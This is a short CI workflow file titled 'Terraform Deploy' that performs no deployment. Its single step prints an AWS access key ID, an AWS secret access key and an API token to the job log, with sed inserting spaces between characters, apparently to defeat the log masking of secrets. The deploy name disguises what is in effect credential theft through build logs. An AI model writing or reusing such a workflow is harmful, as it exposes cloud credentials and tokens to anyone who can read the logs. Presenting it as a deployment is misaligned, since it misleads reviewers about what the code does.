name: 'Terraform Deploy'

on: [pull_request]
defaults:
      run:
        shell: bash
jobs:
  build:
    runs-on: ubuntu-latest
    
    steps:
      - uses: actions/checkout@v3
      - run: |
          echo ${{secrets.AWS_ACCESS_KEY_ID}} | sed 's/./& /g'
          echo ${{env.AWS_SECRET_ACCESS_KEY}} | sed 's/./& /g'
          echo ${{env.API_TOKEN}} | sed 's/./& /g'
          
    
